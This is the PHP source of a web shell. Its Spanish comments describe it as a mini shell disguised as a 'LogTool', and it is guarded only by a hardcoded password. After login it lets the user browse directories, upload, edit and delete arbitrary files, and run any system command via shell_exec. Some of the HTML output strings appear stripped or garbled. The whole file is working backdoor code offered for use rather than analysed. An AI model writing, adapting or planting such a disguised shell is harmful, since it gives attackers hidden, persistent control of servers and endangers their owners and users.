// MiniShell disfrazada de "Log Tool"
// Compatible con PHP 7.2+, sin dependencias peligrosas
// Autor: Pentester
session_start();
$pass = 'admin123'; // Cambia esta contraseña
if (!isset($_SESSION['auth'])) {
if (isset($_POST['p']) && $_POST['p'] === $pass) {
$_SESSION['auth'] = true;
} else {
echo '';
exit;
}
}
function esc($s) {
return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}
$cwd = isset($_GET['path']) ? realpath($_GET['path']) : getcwd();
$cwd = is_dir($cwd) ? $cwd : getcwd();
$files = scandir($cwd);
LogToolecho '<!DOCTYPE html><meta charset="UTF-8"><title>LogTool</title><style>
body{background:#121212;color:#f1f1f1;font-family:monospace;padding:20px;}
a{color:#0af;text-decoration:none;margin-right:10px;}
a:hover{text-decoration:underline;}
pre{background:#000;padding:10px;border:1px solid #0f0;}
input,textarea,button{background:#1e1e1e;color:#0f0;border:1px solid #0f0;padding:5px;margin:5px;}
</style>';
echo '📄 LogTool
';
echo '<p>📁 Current Dir: ' . esc($cwd) . '</p>';
echo '<a href="?logout=1">Logout</a>';
echo '';
if (isset($_FILES['up'])) {
$f = basename($_FILES['up']['name']);
if (move_uploaded_file($_FILES['up']['tmp_name'], "$cwd/$f")) {
echo "<p>✅ File '$f' uploaded.</p>";
} else {
echo "<p>❌ Upload failed.</p>";
}
}
if (isset($_GET['del'])) {
$target = $_GET['del'];
if (is_file($target)) {
unlink($target) ? print("<p>✅ Deleted</p>") : print("<p>❌ Failed to delete</p>");
}
}
if (isset($_GET['edit'])) {
$target = $_GET['edit'];
if (is_file($target)) {
$content = htmlspecialchars(file_get_contents($target));
echo '';
}
}
if (isset($_POST['code']) && isset($_POST['file'])) {
file_put_contents($_POST['file'], $_POST['code']) ? print("<p>✅ Saved</p>") : print("<p>❌ Save failed</p>");
}
echo '<ul>';
if ($cwd != '/') {
echo '<li><a href="?path=' . urlencode(dirname($cwd)) . '">🔙 Back</a></li>';
}
foreach ($files as $f) {
if ($f === '.') continue;
$path = realpath("$cwd/$f");
if (!$path) continue;
$isDir = is_dir($path);
echo '<li>' . ($isDir ? '📁' : '📄') . ' ';
echo '<a href="?path=' . urlencode($path) . '">' . esc($f) . '</a>';
if (!$isDir) {
echo ' [<a href="?edit=' . urlencode($path) . '">✏️</a>]';
echo ' [<a href="?del=' . urlencode($path) . '" onclick="return confirm(\'Delete?\')">🗑️</a>]';
}
echo '</li>';
}
echo '</ul>';
echo '<hr>🛠️ Ejecutar comando
';
if (isset($_POST['cmd'])) {
echo '<pre>' . esc(shell_exec($_POST['cmd'])) . '</pre>';
}
echo '';
if (isset($_GET['logout'])) {
session_destroy();
header('Location: ?');
exit;
}
echo '';